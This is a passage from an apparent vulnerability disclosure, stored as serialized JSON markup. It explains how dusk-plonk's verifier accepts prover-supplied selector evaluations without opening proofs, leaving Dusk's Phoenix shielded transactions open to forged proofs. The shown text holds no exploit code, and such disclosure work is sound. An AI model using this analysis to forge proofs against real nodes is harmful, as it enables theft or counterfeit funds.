51118],{"type":24,"tag":301,"props":151115,"children":151117},{"className":151116,"style":10875},[10874],[],{"type":24,"tag":301,"props":151119,"children":151121},{"className":151120},[10880,10881,10882,10883],[151122],{"type":24,"tag":301,"props":151123,"children":151125},{"className":151124},[10835,10883],[151126],{"type":30,"value":546},{"type":24,"tag":301,"props":151128,"children":151130},{"className":151129},[28514],[151131],{"type":30,"value":28517},{"type":24,"tag":301,"props":151133,"children":151135},{"className":151134},[10860],[151136],{"type":24,"tag":301,"props":151137,"children":151139},{"className":151138,"style":99828},[10865],[151140],{"type":24,"tag":301,"props":151141,"children":151142},{},[],{"type":24,"tag":301,"props":151144,"children":151146},{"className":151145},[28486],[151147],{"type":30,"value":362},{"type":24,"tag":301,"props":151149,"children":151151},{"className":151150,"style":120296},[10835,28357],[151152],{"type":30,"value":120299},{"type":24,"tag":301,"props":151154,"children":151156},{"className":151155},[28508],[151157],{"type":30,"value":9961},{"type":30,"value":151159},", the public-input polynomial at ",{"type":24,"tag":145,"props":151161,"children":151163},{"className":151162},[10807,10808],[151164],{"type":24,"tag":301,"props":151165,"children":151167},{"className":151166},[10813],[151168],{"type":24,"tag":301,"props":151169,"children":151171},{"className":151170,"ariaHidden":10819},[10818],[151172],{"type":24,"tag":301,"props":151173,"children":151175},{"className":151174},[10824],[151176,151180],{"type":24,"tag":301,"props":151177,"children":151179},{"className":151178,"style":117581},[10829],[],{"type":24,"tag":301,"props":151181,"children":151183},{"className":151182,"style":120296},[10835,28357],[151184],{"type":30,"value":120299},{"type":30,"value":151186},"), which are safe because the prover never chooses them. Other values are prover-supplied evaluations accompanied by KZG opening proofs (",{"type":24,"tag":145,"props":151188,"children":151190},{"className":151189},[10807,10808],[151191],{"type":24,"tag":301,"props":151192,"children":151194},{"className":151193},[10813],[151195],{"type":24,"tag":301,"props":151196,"children":151198},{"className":151197,"ariaHidden":10819},[10818],[151199],{"type":24,"tag":301,"props":151200,"children":151202},{"className":151201},[10824],[151203,151207,151212,151217,151222],{"type":24,"tag":301,"props":151204,"children":151206},{"className":151205,"style":10935},[10829],[],{"type":24,"tag":301,"props":151208,"children":151210},{"className":151209},[10835,28357],[151211],{"type":30,"value":188},{"type":24,"tag":301,"props":151213,"children":151215},{"className":151214},[28486],[151216],{"type":30,"value":362},{"type":24,"tag":301,"props":151218,"children":151220},{"className":151219,"style":120296},[10835,28357],[151221],{"type":30,"value":120299},{"type":24,"tag":301,"props":151223,"children":151225},{"className":151224},[28508],[151226],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":151229,"children":151231},{"className":151230},[10807,10808],[151232],{"type":24,"tag":301,"props":151233,"children":151235},{"className":151234},[10813],[151236],{"type":24,"tag":301,"props":151237,"children":151239},{"className":151238,"ariaHidden":10819},[10818],[151240],{"type":24,"tag":301,"props":151241,"children":151243},{"className":151242},[10824],[151244,151248,151253,151258,151263],{"type":24,"tag":301,"props":151245,"children":151247},{"className":151246,"style":10935},[10829],[],{"type":24,"tag":301,"props":151249,"children":151251},{"className":151250},[10835,28357],[151252],{"type":30,"value":5613},{"type":24,"tag":301,"props":151254,"children":151256},{"className":151255},[28486],[151257],{"type":30,"value":362},{"type":24,"tag":301,"props":151259,"children":151261},{"className":151260,"style":120296},[10835,28357],[151262],{"type":30,"value":120299},{"type":24,"tag":301,"props":151264,"children":151266},{"className":151265},[28508],[151267],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":151270,"children":151272},{"className":151271},[10807,10808],[151273],{"type":24,"tag":301,"props":151274,"children":151276},{"className":151275},[10813],[151277],{"type":24,"tag":301,"props":151278,"children":151280},{"className":151279,"ariaHidden":10819},[10818],[151281],{"type":24,"tag":301,"props":151282,"children":151284},{"className":151283},[10824],[151285,151289,151347,151352,151357],{"type":24,"tag":301,"props":151286,"children":151288},{"className":151287,"style":10935},[10829],[],{"type":24,"tag":301,"props":151290,"children":151292},{"className":151291},[10835],[151293,151299],{"type":24,"tag":301,"props":151294,"children":151296},{"className":151295,"style":100230},[10835,28357],[151297],{"type":30,"value":151298},"σ",{"type":24,"tag":301,"props":151300,"children":151302},{"className":151301},[10850],[151303],{"type":24,"tag":301,"props":151304,"children":151306},{"className":151305},[10855,28411],[151307,151336],{"type":24,"tag":301,"props":151308,"children":151310},{"className":151309},[10860],[151311,151331],{"type":24,"tag":301,"props":151312,"children":151314},{"className":151313,"style":99797},[10865],[151315],{"type":24,"tag":301,"props":151316,"children":151317},{"style":100277},[151318,151322],{"type":24,"tag":301,"props":151319,"children":151321},{"className":151320,"style":10875},[10874],[],{"type":24,"tag":301,"props":151323,"children":151325},{"className":151324},[10880,10881,10882,10883],[151326],{"type":24,"tag":301,"props":151327,"children":151329},{"className":151328},[10835,10883],[151330],{"type":30,"value":546},{"type":24,"tag":301,"props":151332,"children":151334},{"className":151333},[28514],[151335],{"type":30,"value":28517},{"type":24,"tag":301,"props":151337,"children":151339},{"className":151338},[10860],[151340],{"type":24,"tag":301,"props":151341,"children":151343},{"className":151342,"style":99828},[10865],[151344],{"type":24,"tag":301,"props":151345,"children":151346},{},[],{"type":24,"tag":301,"props":151348,"children":151350},{"className":151349},[28486],[151351],{"type":30,"value":362},{"type":24,"tag":301,"props":151353,"children":151355},{"className":151354,"style":120296},[10835,28357],[151356],{"type":30,"value":120299},{"type":24,"tag":301,"props":151358,"children":151360},{"className":151359},[28508],[151361],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":151364,"children":151366},{"className":151365},[10807,10808],[151367],{"type":24,"tag":301,"props":151368,"children":151370},{"className":151369},[10813],[151371],{"type":24,"tag":301,"props":151372,"children":151374},{"className":151373,"ariaHidden":10819},[10818],[151375],{"type":24,"tag":301,"props":151376,"children":151378},{"className":151377},[10824],[151379,151383,151388,151393,151398,151404],{"type":24,"tag":301,"props":151380,"children":151382},{"className":151381,"style":10935},[10829],[],{"type":24,"tag":301,"props":151384,"children":151386},{"className":151385},[10835,28357],[151387],{"type":30,"value":188},{"type":24,"tag":301,"props":151389,"children":151391},{"className":151390},[28486],[151392],{"type":30,"value":362},{"type":24,"tag":301,"props":151394,"children":151396},{"className":151395,"style":120296},[10835,28357],[151397],{"type":30,"value":120299},{"type":24,"tag":301,"props":151399,"children":151401},{"className":151400,"style":100230},[10835,28357],[151402],{"type":30,"value":151403},"ω",{"type":24,"tag":301,"props":151405,"children":151407},{"className":151406},[28508],[151408],{"type":30,"value":9961},{"type":30,"value":151410},"), which are safe because the opening binds them to previously committed polynomials. A third category consists of verifier-key commitments used directly in the linearization multiscalar multiplication (",{"type":24,"tag":145,"props":151412,"children":151414},{"className":151413},[10807,10808],[151415],{"type":24,"tag":301,"props":151416,"children":151418},{"className":151417},[10813],[151419],{"type":24,"tag":301,"props":151420,"children":151422},{"className":151421,"ariaHidden":10819},[10818],[151423],{"type":24,"tag":301,"props":151424,"children":151426},{"className":151425},[10824],[151427,151431,151436,151493],{"type":24,"tag":301,"props":151428,"children":151430},{"className":151429,"style":10935},[10829],[],{"type":24,"tag":301,"props":151432,"children":151434},{"className":151433},[28486],[151435],{"type":30,"value":541},{"type":24,"tag":301,"props":151437,"children":151439},{"className":151438},[10835],[151440,151445],{"type":24,"tag":301,"props":151441,"children":151443},{"className":151442,"style":100230},[10835,28357],[151444],{"type":30,"value":100233},{"type":24,"tag":301,"props":151446,"children":151448},{"className":151447},[10850],[151449],{"type":24,"tag":301,"props":151450,"children":151452},{"className":151451},[10855,28411],[151453,151482],{"type":24,"tag":301,"props":151454,"children":151456},{"className":151455},[10860],[151457,151477],{"type":24,"tag":301,"props":151458,"children":151460},{"className":151459,"style":149269},[10865],[151461],{"type":24,"tag":301,"props":151462,"children":151463},{"style":100277},[151464,151468],{"type":24,"tag":301,"props":151465,"children":151467},{"className":151466,"style":10875},[10874],[],{"type":24,"tag":301,"props":151469,"children":151471},{"className":151470},[10880,10881,10882,10883],[151472],{"type":24,"tag":301,"props":151473,"children":151475},{"className":151474,"style":101752},[10835,28357,10883],[151476],{"type":30,"value":101755},{"type":24,"tag":301,"props":151478,"children":151480},{"className":151479},[28514],[151481],{"type":30,"value":28517},{"type":24,"tag":301,"props":151483,"children":151485},{"className":151484},[10860],[151486],{"type":24,"tag":301,"props":151487,"children":151489},{"className":151488,"style":99828},[10865],[151490],{"type":24,"tag":301,"props":151491,"children":151492},{},[],{"type":24,"tag":301,"props":151494,"children":151496},{"className":151495},[28508],[151497],{"type":30,"value":22200},{"type":30,"value":377},{"type":24,"tag":145,"props":151500,"children":151502},{"className":151501},[10807,10808],[151503],{"type":24,"tag":301,"props":151504,"children":151506},{"className":151505},[10813],[151507],{"type":24,"tag":301,"props":151508,"children":151510},{"className":151509,"ariaHidden":10819},[10818],[151511],{"type":24,"tag":301,"props":151512,"children":151514},{"className":151513},[10824],[151515,151519,151524,151581],{"type":24,"tag":301,"props":151516,"children":151518},{"className":151517,"style":10935},[10829],[],{"type":24,"tag":301,"props":151520,"children":151522},{"className":151521},[28486],[151523],{"type":30,"value":541},{"type":24,"tag":301,"props":151525,"children":151527},{"className":151526},[10835],[151528,151533],{"type":24,"tag":301,"props":151529,"children":151531},{"className":151530,"style":100230},[10835,28357],[151532],{"type":30,"value":100233},{"type":24,"tag":301,"props":151534,"children":151536},{"className":151535},[10850],[151537],{"type":24,"tag":301,"props":151538,"children":151540},{"className":151539},[10855,28411],[151541,151570],{"type":24,"tag":301,"props":151542,"children":151544},{"className":151543},[10860],[151545,151565],{"type":24,"tag":301,"props":151546,"children":151548},{"className":151547,"style":149269},[10865],[151549],{"type":24,"tag":301,"props":151550,"children":151551},{"style":100277},[151552,151556],{"type":24,"tag":301,"props":151553,"children":151555},{"className":151554,"style":10875},[10874],[],{"type":24,"tag":301,"props":151557,"children":151559},{"className":151558},[10880,10881,10882,10883],[151560],{"type":24,"tag":301,"props":151561,"children":151563},{"className":151562,"style":99745},[10835,28357,10883],[151564],{"type":30,"value":122058},{"type":24,"tag":301,"props":151566,"children":151568},{"className":151567},[28514],[151569],{"type":30,"value":28517},{"type":24,"tag":301,"props":151571,"children":151573},{"className":151572},[10860],[151574],{"type":24,"tag":301,"props":151575,"children":151577},{"className":151576,"style":99828},[10865],[151578],{"type":24,"tag":301,"props":151579,"children":151580},{},[],{"type":24,"tag":301,"props":151582,"children":151584},{"className":151583},[28508],[151585],{"type":30,"value":22200},{"type":30,"value":377},{"type":24,"tag":145,"props":151588,"children":151590},{"className":151589},[10807,10808],[151591],{"type":24,"tag":301,"props":151592,"children":151594},{"className":151593},[10813],[151595],{"type":24,"tag":301,"props":151596,"children":151598},{"className":151597,"ariaHidden":10819},[10818],[151599],{"type":24,"tag":301,"props":151600,"children":151602},{"className":151601},[10824],[151603,151607,151612,151669],{"type":24,"tag":301,"props":151604,"children":151606},{"className":151605,"style":10935},[10829],[],{"type":24,"tag":301,"props":151608,"children":151610},{"className":151609},[28486],[151611],{"type":30,"value":541},{"type":24,"tag":301,"props":151613,"children":151615},{"className":151614},[10835],[151616,151621],{"type":24,"tag":301,"props":151617,"children":151619},{"className":151618,"style":100230},[10835,28357],[151620],{"type":30,"value":151298},{"type":24,"tag":301,"props":151622,"children":151624},{"className":151623},[10850],[151625],{"type":24,"tag":301,"props":151626,"children":151628},{"className":151627},[10855,28411],[151629,151658],{"type":24,"tag":301,"props":151630,"children":151632},{"className":151631},[10860],[151633,151653],{"type":24,"tag":301,"props":151634,"children":151636},{"className":151635,"style":99797},[10865],[151637],{"type":24,"tag":301,"props":151638,"children":151639},{"style":100277},[151640,151644],{"type":24,"tag":301,"props":151641,"children":151643},{"className":151642,"style":10875},[10874],[],{"type":24,"tag":301,"props":151645,"children":151647},{"className":151646},[10880,10881,10882,10883],[151648],{"type":24,"tag":301,"props":151649,"children":151651},{"className":151650},[10835,10883],[151652],{"type":30,"value":1761},{"type":24,"tag":301,"props":151654,"children":151656},{"className":151655},[28514],[151657],{"type":30,"value":28517},{"type":24,"tag":301,"props":151659,"children":151661},{"className":151660},[10860],[151662],{"type":24,"tag":301,"props":151663,"children":151665},{"className":151664,"style":99828},[10865],[151666],{"type":24,"tag":301,"props":151667,"children":151668},{},[],{"type":24,"tag":301,"props":151670,"children":151672},{"className":151671},[28508],[151673],{"type":30,"value":22200},{"type":30,"value":151675},"), which are safe because the verifier never trusts a bare field element for these; it uses the commitment itself.",{"type":24,"tag":32,"props":151677,"children":151678},{},[151679],{"type":30,"value":151680},"Any term that falls outside those three categories is attacker-controlled by construction.",{"type":24,"tag":2719,"props":151682,"children":151683},{},[],{"type":24,"tag":43,"props":151685,"children":151687},{"id":151686},"where-dusk-plonk-differs-from-textbook-plonk",[151688],{"type":30,"value":151689},"Where dusk-plonk differs from textbook PLONK",{"type":24,"tag":32,"props":151691,"children":151692},{},[151693,151702,151704,151709,151711,151741],{"type":24,"tag":188,"props":151694,"children":151696},{"href":148569,"rel":151695},[192],[151697],{"type":24,"tag":145,"props":151698,"children":151700},{"className":151699},[],[151701],{"type":30,"value":148573},{"type":30,"value":151703}," is not a literal transcription of the 2019 PLONK paper. It extends the arithmetic gate with a fourth wire ",{"type":24,"tag":145,"props":151705,"children":151707},{"className":151706},[],[151708],{"type":30,"value":77277},{"type":30,"value":151710},", adds custom widgets for range, logic, and elliptic-curve operations, uses shifted evaluations at ",{"type":24,"tag":145,"props":151712,"children":151714},{"className":151713},[10807,10808],[151715],{"type":24,"tag":301,"props":151716,"children":151718},{"className":151717},[10813],[151719],{"type":24,"tag":301,"props":151720,"children":151722},{"className":151721,"ariaHidden":10819},[10818],[151723],{"type":24,"tag":301,"props":151724,"children":151726},{"className":151725},[10824],[151727,151731,151736],{"type":24,"tag":301,"props":151728,"children":151730},{"className":151729,"style":117581},[10829],[],{"type":24,"tag":301,"props":151732,"children":151734},{"className":151733,"style":120296},[10835,28357],[151735],{"type":30,"value":120299},{"type":24,"tag":301,"props":151737,"children":151739},{"className":151738,"style":100230},[10835,28357],[151740],{"type":30,"value":151403},{"type":30,"value":151742},", and heavily batches KZG openings. None of that is exotic by modern PLONK standards, but it does make the verifier harder to reason about than the minimal paper presentation.",{"type":24,"tag":32,"props":151744,"children":151745},{},[151746,151748,151753,151754,151759,151761,151767,151769,151776],{"type":30,"value":151747},"The important part for this bug is the boundary between ",{"type":24,"tag":60,"props":151749,"children":151750},{},[151751],{"type":30,"value":151752},"public circuit data",{"type":30,"value":2378},{"type":24,"tag":60,"props":151755,"children":151756},{},[151757],{"type":30,"value":151758},"prover claims about that data at the random challenge point",{"type":30,"value":151760},". Parallel implementations avoid this ambiguity by keeping selector polynomials strictly out of the prover's hands. For example, Consensys' gnark (one of the most widely deployed PLONK implementations) never asks the prover for selector evaluations at all. Instead, the verifier incorporates the selector commitments ",{"type":24,"tag":145,"props":151762,"children":151764},{"className":151763},[],[151765],{"type":30,"value":151766},"Ql, Qr, Qm, Qo, Qk",{"type":30,"value":151768}," directly into the ",{"type":24,"tag":188,"props":151770,"children":151773},{"href":151771,"rel":151772},"https://github.com/Consensys/gnark/blob/17b079f1b813d9dafd465202466b09f282b4c5e9/backend/plonk/bls12-381/verify.go#L253-L270",[192],[151774],{"type":30,"value":151775},"linearization multi-scalar multiplication",{"type":30,"value":151777},", ensuring their values are cryptographically bound by construction.",{"type":24,"tag":32,"props":151779,"children":151780},{},[151781,151783,151808],{"type":30,"value":151782},"Dusk's custom widgets were more complex (multiplying selectors with other evaluated terms), so they could not just use a simple linear combination of commitments. Their architecture required evaluating the selectors at ",{"type":24,"tag":145,"props":151784,"children":151786},{"className":151785},[10807,10808],[151787],{"type":24,"tag":301,"props":151788,"children":151790},{"className":151789},[10813],[151791],{"type":24,"tag":301,"props":151792,"children":151794},{"className":151793,"ariaHidden":10819},[10818],[151795],{"type":24,"tag":301,"props":151796,"children":151798},{"className":151797},[10824],[151799,151803],{"type":24,"tag":301,"props":151800,"children":151802},{"className":151801,"style":117581},[10829],[],{"type":24,"tag":301,"props":151804,"children":151806},{"className":151805,"style":120296},[10835,28357],[151807],{"type":30,"value":120299},{"type":30,"value":151809}," and using those scalars. But while they serialized those four selector evaluations into the proof struct, they never actually verified them against the verifier key's commitments through an opening proof.",{"type":24,"tag":32,"props":151811,"children":151812},{},[151813],{"type":30,"value":151814},"The shortest way to see the bug is the graph below: safe values flow through the opening path toward the final pairing check, while the red selector flow enters verifier logic without ever touching an opening proof.",{"type":24,"tag":151816,"props":151817,"children":151818},"dusk-verifier-dependence-graph",{},[],{"type":24,"tag":2719,"props":151820,"children":151821},{},[],{"type":24,"tag":43,"props":151823,"children":151825},{"id":151824},"how-dusk-uses-plonk",[151826],{"type":30,"value":151827},"How Dusk uses PLONK",{"type":24,"tag":32,"props":151829,"children":151830},{},[151831,151837],{"type":24,"tag":188,"props":151832,"children":151834},{"href":148578,"rel":151833},[192],[151835],{"type":30,"value":151836},"Dusk Network",{"type":30,"value":151838}," is a privacy-focused L1 blockchain. Its transaction model has two modes:",{"type":24,"tag":2655,"props":151840,"children":151841},{},[151842,151847],{"type":24,"tag":2659,"props":151843,"children":151844},{},[151845],{"type":30,"value":151846},"Phoenix (shielded): amounts and participants are hidden using ZK proofs, and every Phoenix transaction carries a PLONK proof that the transaction is valid.",{"type":24,"tag":2659,"props":151848,"children":151849},{},[151850],{"type":30,"value":151851},"Moonlight (transparent): standard account-based transactions verified by BLS signatures, with no PLONK involvement.",{"type":24,"tag":32,"props":151853,"children":151854},{},[151855,151857,151868,151870,151881],{"type":30,"value":151856},"At node level, every ",{"type":24,"tag":188,"props":151858,"children":151861},{"href":151859,"rel":151860},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L152-L185",[192],[151862],{"type":24,"tag":145,"props":151863,"children":151865},{"className":151864},[],[151866],{"type":30,"value":151867},"ProtocolTransaction::Phoenix",{"type":30,"value":151869}," goes through ",{"type":24,"tag":188,"props":151871,"children":151874},{"href":151872,"rel":151873},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/verifier.rs#L71-L82",[192],[151875],{"type":24,"tag":145,"props":151876,"children":151878},{"className":151877},[],[151879],{"type":30,"value":151880},"verify_proof_with_version()",{"type":30,"value":151882}," during preverification. If that PLONK proof verifies, the transaction is admitted to the mempool and can later be mined into a block. Moonlight-path transactions instead go through BLS signature verification.",{"type":24,"tag":32,"props":151884,"children":151885},{},[151886,151888,151899,151901,151912,151913,151924,151925,151936,151937,151948],{"type":30,"value":151887},"That same Phoenix proof path covers more than simple shielded transfers. Phoenix-path staking, reward withdrawals, unstaking, and Phoenix-to-Moonlight conversion all build a Phoenix transaction via ",{"type":24,"tag":188,"props":151889,"children":151892},{"href":151890,"rel":151891},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L54-L95",[192],[151893],{"type":24,"tag":145,"props":151894,"children":151896},{"className":151895},[],[151897],{"type":30,"value":151898},"phoenix()",{"type":30,"value":151900},", for example in ",{"type":24,"tag":188,"props":151902,"children":151905},{"href":151903,"rel":151904},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L144-L186",[192],[151906],{"type":24,"tag":145,"props":151907,"children":151909},{"className":151908},[],[151910],{"type":30,"value":151911},"phoenix_stake()",{"type":30,"value":377},{"type":24,"tag":188,"props":151914,"children":151917},{"href":151915,"rel":151916},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L240-L298",[192],[151918],{"type":24,"tag":145,"props":151919,"children":151921},{"className":151920},[],[151922],{"type":30,"value":151923},"phoenix_stake_reward()",{"type":30,"value":377},{"type":24,"tag":188,"props":151926,"children":151929},{"href":151927,"rel":151928},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L358-L416",[192],[151930],{"type":24,"tag":145,"props":151931,"children":151933},{"className":151932},[],[151934],{"type":30,"value":151935},"phoenix_unstake()",{"type":30,"value":8410},{"type":24,"tag":188,"props":151938,"children":151941},{"href":151939,"rel":151940},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L481-L539",[192],[151942],{"type":24,"tag":145,"props":151943,"children":151945},{"className":151944},[],[151946],{"type":30,"value":151947},"phoenix_to_moonlight()",{"type":30,"value":151949},". So if Phoenix proof verification is unsound, the entire shielded transaction path is exposed.",{"type":24,"tag":32,"props":151951,"children":151952},{},[151953],{"type":24,"tag":177,"props":151954,"children":151957},{"alt":151955,"src":151956},"phoenix_moonlight","/posts/dusk-commitment-issues/phoenix_moonlight.svg",[],{"type":24,"tag":32,"props":151959,"children":151960},{},[151961,151963,151969,151971,151978],{"type":30,"value":151962},"The PLONK implementation, ",{"type":24,"tag":188,"props":151964,"children":151967},{"href":151965,"rel":151966},"https://github.com/dusk-network/plonk",[192],[151968],{"type":30,"value":148573},{"type":30,"value":151970},", is a standalone library by the Dusk team. It was among the first PLONK implementations written, with development starting the same year ",{"type":24,"tag":188,"props":151972,"children":151975},{"href":151973,"rel":151974},"https://eprint.iacr.org/archive/2019/953/1566424053.pdf",[192],[151976],{"type":30,"value":151977},"the original paper",{"type":30,"value":151979}," was released.",{"type":24,"tag":32,"props":151981,"children":151982},{},[151983,151985,151991],{"type":30,"value":151984},"The Phoenix transaction PLONK circuit is defined ",{"type":24,"tag":188,"props":151986,"children":151989},{"href":151987,"rel":151988},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L20-L205",[192],[151990],{"type":30,"value":5193},{"type":30,"value":151992},". The circuit enforces the following set of constraints:",{"type":24,"tag":62466,"props":151994,"children":151995},{},[151996,152012],{"type":24,"tag":129689,"props":151997,"children":151998},{},[151999],{"type":24,"tag":129693,"props":152000,"children":152001},{},[152002,152007],{"type":24,"tag":129697,"props":152003,"children":152004},{},[152005],{"type":30,"value":152006},"Circuit check",{"type":24,"tag":129697,"props":152008,"children":152009},{},[152010],{"type":30,"value":152011},"Statement being checked",{"type":24,"tag":129717,"props":152013,"children":152014},{},[152015,152033,152051,152069,152087,152244,152384,152402],{"type":24,"tag":129693,"props":152016,"children":152017},{},[152018,152028],{"type":24,"tag":129724,"props":152019,"children":152020},{},[152021],{"type":24,"tag":188,"props":152022,"children":152025},{"href":152023,"rel":152024},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L106-L126",[192],[152026],{"type":30,"value":152027},"Merkle tree membership",{"type":24,"tag":129724,"props":152029,"children":152030},{},[152031],{"type":30,"value":152032},"Each input note hash is opened against the public Merkle root, so only notes already in the note tree may be spent",{"type":24,"tag":129693,"props":152034,"children":152035},{},[152036,152046],{"type":24,"tag":129724,"props":152037,"children":152038},{},[152039],{"type":24,"tag":188,"props":152040,"children":152043},{"href":152041,"rel":152042},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L70-L79",[192],[152044],{"type":30,"value":152045},"Input-note secret-key authorization",{"type":24,"tag":129724,"props":152047,"children":152048},{},[152049],{"type":30,"value":152050},"The prover knows the secret key controlling each input note",{"type":24,"tag":129693,"props":152052,"children":152053},{},[152054,152064],{"type":24,"tag":129724,"props":152055,"children":152056},{},[152057],{"type":24,"tag":188,"props":152058,"children":152061},{"href":152059,"rel":152060},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L81-L87",[192],[152062],{"type":30,"value":152063},"Nullifier correctness",{"type":24,"tag":129724,"props":152065,"children":152066},{},[152067],{"type":30,"value":152068},"Each nullifier matches the corresponding note key and position",{"type":24,"tag":129693,"props":152070,"children":152071},{},[152072,152082],{"type":24,"tag":129724,"props":152073,"children":152074},{},[152075],{"type":24,"tag":188,"props":152076,"children":152079},{"href":152077,"rel":152078},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L149-L160",[192],[152080],{"type":30,"value":152081},"Output value commitment correctness",{"type":24,"tag":129724,"props":152083,"children":152084},{},[152085],{"type":30,"value":152086},"Each public output commitment matches the secret output value and blinder",{"type":24,"tag":129693,"props":152088,"children":152089},{},[152090,152100],{"type":24,"tag":129724,"props":152091,"children":152092},{},[152093],{"type":24,"tag":188,"props":152094,"children":152097},{"href":152095,"rel":152096},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L167-L178",[192],[152098],{"type":30,"value":152099},"Balance integrity",{"type":24,"tag":129724,"props":152101,"children":152102},{},[152103],{"type":24,"tag":145,"props":152104,"children":152106},{"className":152105},[10807,10808],[152107],{"type":24,"tag":301,"props":152108,"children":152110},{"className":152109},[10813],[152111],{"type":24,"tag":301,"props":152112,"children":152114},{"className":152113,"ariaHidden":10819},[10818],[152115,152155,152195,152227],{"type":24,"tag":301,"props":152116,"children":152118},{"className":152117},[10824],[152119,152123,152128,152132,152142,152146,152151],{"type":24,"tag":301,"props":152120,"children":152122},{"className":152121,"style":10935},[10829],[],{"type":24,"tag":301,"props":152124,"children":152126},{"className":152125,"style":28400},[28393,28398,28399],[152127],{"type":30,"value":115536},{"type":24,"tag":301,"props":152129,"children":152131},{"className":152130,"style":10953},[10914],[],{"type":24,"tag":301,"props":152133,"children":152135},{"className":152134},[10835,30],[152136],{"type":24,"tag":301,"props":152137,"children":152139},{"className":152138},[10835],[152140],{"type":30,"value":152141},"inputs",{"type":24,"tag":301,"props":152143,"children":152145},{"className":152144,"style":11012},[10914],[],{"type":24,"tag":301,"props":152147,"children":152149},{"className":152148},[11017],[152150],{"type":30,"value":523},{"type":24,"tag":301,"props":152152,"children":152154},{"className":152153,"style":11012},[10914],[],{"type":24,"tag":301,"props":152156,"children":152158},{"className":152157},[10824],[152159,152163,152168,152172,152182,152186,152191],{"type":24,"tag":301,"props":152160,"children":152162},{"className":152161,"style":10935},[10829],[],{"type":24,"tag":301,"props":152164,"children":152166},{"className":152165,"style":28400},[28393,28398,28399],[152167],{"type":30,"value":115536},{"type":24,"tag":301,"props":152169,"children":152171},{"className":152170,"style":10953},[10914],[],{"type":24,"tag":301,"props":152173,"children":152175},{"className":152174},[10835,30],[152176],{"type":24,"tag":301,"props":152177,"children":152179},{"className":152178},[10835],[152180],{"type":30,"value":152181},"outputs",{"type":24,"tag":301,"props":152183,"children":152185},{"className":152184,"style":10915},[10914],[],{"type":24,"tag":301,"props":152187,"children":152189},{"className":152188},[10920],[152190],{"type":30,"value":11206},{"type":24,"tag":301,"props":152192,"children":152194},{"className":152193,"style":10915},[10914],[],{"type":24,"tag":301,"props":152196,"children":152198},{"className":152197},[10824],[152199,152204,152214,152218,152223],{"type":24,"tag":301,"props":152200,"children":152203},{"className":152201,"style":152202},[10829],"height:0.7778em;vertical-align:-0.0833em;",[],{"type":24,"tag":301,"props":152205,"children":152207},{"className":152206},[10835,30],[152208],{"type":24,"tag":301,"props":152209,"children":152211},{"className":152210},[10835],[152212],{"type":30,"value":152213},"fee",{"type":24,"tag":301,"props":152215,"children":152217},{"className":152216,"style":10915},[10914],[],{"type":24,"tag":301,"props":152219,"children":152221},{"className":152220},[10920],[152222],{"type":30,"value":11206},{"type":24,"tag":301,"props":152224,"children":152226},{"className":152225,"style":10915},[10914],[],{"type":24,"tag":301,"props":152228,"children":152230},{"className":152229},[10824],[152231,152235],{"type":24,"tag":301,"props":152232,"children":152234},{"className":152233,"style":121794},[10829],[],{"type":24,"tag":301,"props":152236,"children":152238},{"className":152237},[10835,30],[152239],{"type":24,"tag":301,"props":152240,"children":152242},{"className":152241},[10835],[152243],{"type":30,"value":68675},{"type":24,"tag":129693,"props":152245,"children":152246},{},[152247,152264],{"type":24,"tag":129724,"props":152248,"children":152249},{},[152250,152257,152258],{"type":24,"tag":188,"props":152251,"children":152254},{"href":152252,"rel":152253},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L89-L90",[192],[152255],{"type":30,"value":152256},"Range checks on inputs",{"type":30,"value":2378},{"type":24,"tag":188,"props":152259,"children":152262},{"href":152260,"rel":152261},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L141-L142",[192],[152263],{"type":30,"value":152181},{"type":24,"tag":129724,"props":152265,"children":152266},{},[152267,152269],{"type":30,"value":152268},"All note values lie in ",{"type":24,"tag":145,"props":152270,"children":152272},{"className":152271},[10807,10808],[152273],{"type":24,"tag":301,"props":152274,"children":152276},{"className":152275},[10813],[152277],{"type":24,"tag":301,"props":152278,"children":152280},{"className":152279,"ariaHidden":10819},[10818],[152281,152366],{"type":24,"tag":301,"props":152282,"children":152284},{"className":152283},[10824],[152285,152289,152294,152299,152304,152308,152353,152357,152362],{"type":24,"tag":301,"props":152286,"children":152288},{"className":152287,"style":122051},[10829],[],{"type":24,"tag":301,"props":152290,"children":152292},{"className":152291},[28486],[152293],{"type":30,"value":541},{"type":24,"tag":301,"props":152295,"children":152297},{"className":152296},[10835],[152298],{"type":30,"value":584},{"type":24,"tag":301,"props":152300,"children":152302},{"className":152301},[10946],[152303],{"type":30,"value":10949},{"type":24,"tag":301,"props":152305,"children":152307},{"className":152306,"style":10953},[10914],[],{"type":24,"tag":301,"props":152309,"children":152311},{"className":152310},[10835],[152312,152317],{"type":24,"t